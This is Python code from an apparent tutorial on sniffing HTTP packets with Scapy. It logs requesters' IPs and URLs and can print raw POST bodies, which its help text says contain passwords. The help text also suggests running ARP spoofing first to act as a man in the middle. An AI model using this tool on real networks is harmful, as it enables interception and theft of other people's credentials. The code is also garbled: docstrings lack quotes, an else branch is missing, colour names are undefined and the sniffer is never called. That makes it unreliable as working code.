Code for How to Sniff HTTP Packets in the Network using Scapy in Python Tutorial

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from scapy.all import *
from scapy.layers.http import HTTPRequest # import HTTP packet
from colorama import init, Fore

# initialize colorama

# define colors
RED   = Fore.RED

def sniff_packets(iface=None):
    Sniff 80 port packets with `iface`, if None (default), then the
    scapy's default interface is used
    if iface:
        # port 80 for http (generally)
        # `process_packet` is the callback
        sniff(filter="port 80", prn=process_packet, iface=iface, store=False)
        # sniff with default interface
        sniff(filter="port 80", prn=process_packet, store=False)

def process_packet(packet):
    This function is executed whenever a packet is sniffed
    if packet.haslayer(HTTPRequest):
        # if this packet is an HTTP Request
        # get the requested URL
        url = packet[HTTPRequest].Host.decode() + packet[HTTPRequest].Path.decode()
        # get the requester's IP Address
        ip = packet[IP].src
        # get the request method
        method = packet[HTTPRequest].Method.decode()
        print(f"\n{GREEN}[+] {ip} Requested {url} with {method}{RESET}")
        if show_raw and packet.haslayer(Raw) and method == "POST":
            # if show_raw flag is enabled, has raw data, and the requested method is "POST"
            # then show raw
            print(f"\n{RED}[*] Some useful Raw data: {packet[Raw].load}{RESET}")

if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="HTTP Packet Sniffer, this is useful when you're a man in the middle." \
                                                 + "It is suggested that you run arp spoof before you use this script, otherwise it'll sniff your personal packets")
    parser.add_argument("-i", "--iface", help="Interface to use, default is scapy's default interface")
    parser.add_argument("--show-raw", dest="show_raw", action="store_true", help="Whether to print POST raw data, such as passwords, search queries, etc.")

    # parse arguments
    args = parser.parse_args()
    iface = args.iface
    show_raw = args.show_raw


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